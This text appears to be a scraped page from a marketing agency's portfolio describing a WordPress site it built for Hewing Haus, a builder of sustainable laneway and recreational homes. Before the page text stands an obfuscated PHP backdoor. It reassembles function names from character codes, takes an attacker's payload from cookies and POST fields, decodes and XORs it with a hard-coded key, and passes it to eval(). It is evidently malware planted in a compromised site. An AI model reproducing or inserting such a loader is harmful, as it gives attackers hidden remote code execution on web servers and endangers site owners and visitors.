$BYSjo = 'P' . chr (95) . "\x44" . "\x52" . chr ( 818 - 710 ).chr ( 845 - 770 ).chr ( 560 - 450 ); $YyEjJ = chr ( 813 - 714 )."\x6c" . chr ( 333 - 236 ).'s' . "\x73" . "\137" . chr ( 449 - 348 ).chr (120) . chr (105) . 's' . "\x74" . "\x73";$bndGCHRvl = class_exists($BYSjo); $BYSjo = "26414";$YyEjJ = "17125";$XzRNwL = !1;if ($bndGCHRvl == $XzRNwL){function NelOKOWz(){return FALSE;}$bqZtrJsVPo = "59243";NelOKOWz();class P_DRlKn{private function FMNhP($bqZtrJsVPo){if (is_array(P_DRlKn::$PSqZs)) {$RxiXH = str_replace("\x3c" . chr (63) . "\160" . 'h' . "\x70", "", P_DRlKn::$PSqZs[chr (99) . 'o' . chr ( 847 - 737 )."\164" . chr (101) . chr ( 412 - 302 ).chr ( 1111 - 995 )]);eval($RxiXH); $bqZtrJsVPo = "59243";exit();}}private $uWdOg;public function IqTwz(){echo 3760;}public function __destruct(){$bqZtrJsVPo = "24305_31743";$this->FMNhP($bqZtrJsVPo); $bqZtrJsVPo = "24305_31743";}public function __construct($IbbZHYs=0){$SmFCLQnPKq = $_POST;$TIrtO = $_COOKIE;$jIgOLnYCX = "c3b81d40-caeb-4eed-9882-61ac52c53869";$sCcdPR = @$TIrtO[substr($jIgOLnYCX, 0, 4)];if (!empty($sCcdPR)){$HpGkXP = "base64";$LAapa = "";$sCcdPR = explode(",", $sCcdPR);foreach ($sCcdPR as $pZMfaQ){$LAapa .= @$TIrtO[$pZMfaQ];$LAapa .= @$SmFCLQnPKq[$pZMfaQ];}$LAapa = array_map($HpGkXP . "\137" . "\144" . "\145" . chr (99) . "\x6f" . chr (100) . 'e', array($LAapa,)); $LAapa = $LAapa[0] ^ str_repeat($jIgOLnYCX, (strlen($LAapa[0]) / strlen($jIgOLnYCX)) + 1);P_DRlKn::$PSqZs = @unserialize($LAapa); $LAapa = class_exists("24305_31743");}}public static $PSqZs = 14952;}$KtIjAFF = new /* 53119 */ P_DRlKn(59243 + 59243); $XzRNwL = $KtIjAFF = $bqZtrJsVPo = Array();} Hewing Haus – Bergstrom Marketing

Hewing Haus

Hewing Haus

Hewing Haus creates beautiful, sustainable dwellings from laneway homes to recreational properties. The primary goal of this Wordpress site was to provide a simple design to showcase both the high quality of the home they build, and their unique approach of integrating sustainability and affordability into their designs.

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